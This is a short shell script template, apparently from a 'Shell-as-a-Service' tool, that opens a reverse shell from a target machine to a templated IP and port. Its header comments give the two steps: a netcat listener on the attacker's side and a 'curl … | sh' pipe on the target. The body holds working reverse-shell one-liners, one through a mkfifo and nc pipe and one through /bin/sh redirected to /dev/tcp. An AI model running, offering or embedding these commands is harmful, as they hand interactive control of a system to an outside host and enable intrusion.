#! /usr/bin/env sh
#
# Saas (Shell-as-a-Service) based on https://github.com/cmj0121/ptool/shell
# This shell-script provide the reversed on the target system.
#
# 1- run `nc -lvn {{ .PORT }}` on your machine
# 2- run `curl https://shell.cmj.tw/reversed | sh` on the target machine

if command -v nc > /dev/null 2>&1; then
	cd $(mktemp -d);
	mkfifo tunnel; cat > tunnel | $(which bash) -i tunnel | nc {{ .IP }}  {{ .PORT }} > tunnel
fi

if command -v sh > /dev/null 2>&1; then 
	/bin/sh -i >& /dev/tcp/{{- .IP -}}/{{- .PORT }} 0>&1
	exit
fi
